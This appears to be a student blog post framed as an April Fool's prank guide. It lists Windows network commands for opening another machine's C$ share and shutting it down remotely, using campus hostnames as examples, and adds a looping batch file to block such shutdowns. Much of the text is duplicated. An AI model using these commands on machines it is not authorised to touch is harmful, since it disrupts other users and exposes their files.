Windows NT hacks
Hello LockBoxxers! Today is April Fool's day, so I thought I might teach some really neat little commands to play with over a WindowsNT network. This post is especially applicable to my fellow ESU students, as all of these commands work across the entire ESU campus (**These vulnerabilities have been patched across ESU**).
For starters, you need ports open for SMB communication, either port 139 or 445. Or if your Windows firewall is blocking you, just enable 'File and Printer Sharing'.
The majority of these commands will be executed from out 'Run' interface.
To access another machine's C drive, simply type:
\\[compName]\c$ :: An ESU example: \\sc356-22\c$
To remotely shutdown another machine, simply type:
shutdown /s /m \\[compName] :: An ESU example: shutdown /s /m \\sc356-22
To abort a remote shutdown on any machine, simply type:
shutdown /a \\[compName] :: An ESU example: shutdown /a \\sc256-22
Now there are also some easy scripts to make you immune to this type of shutdown. For these a simple little batch file as follows:
@echo off
:loop
shutdown -a
goto loop
:: Just save that as .bat, and run it all day, erry day. Disclaimer: This is not an absolute fix, I know more commands to get around this simple .bat, but it is a good defense. If you want a solid fix, block the previously mentioned ports via your firewall.
Here's a great document on the rest of the options in Shutdown.
For some more Windows NT hacks, here are some unconventional methods for resetting your administrator password.
Happy April, fools.
For starters, you need ports open for SMB communication, either port 139 or 445. Or if your Windows firewall is blocking you, just enable 'File and Printer Sharing'.
The majority of these commands will be executed from out 'Run' interface.
To access another machine's C drive, simply type:
\\[compName]\c$ :: An ESU example: \\sc356-22\c$
To remotely shutdown another machine, simply type:
shutdown /s /m \\[compName] :: An ESU example: shutdown /s /m \\sc356-22
To abort a remote shutdown on any machine, simply type:
shutdown /a \\[compName] :: An ESU example: shutdown /a \\sc256-22
Now there are also some easy scripts to make you immune to this type of shutdown. For these a simple little batch file as follows:
@echo off
:loop
shutdown -a
goto loop
:: Just save that as .bat, and run it all day, erry day. Disclaimer: This is not an absolute fix, I know more commands to get around this simple .bat, but it is a good defense. If you want a solid fix, block the previously mentioned ports via your firewall.
Here's a great document on the rest of the options in Shutdown.
For some more Windows NT hacks, here are some unconventional methods for resetting your administrator password.
Happy April, fools.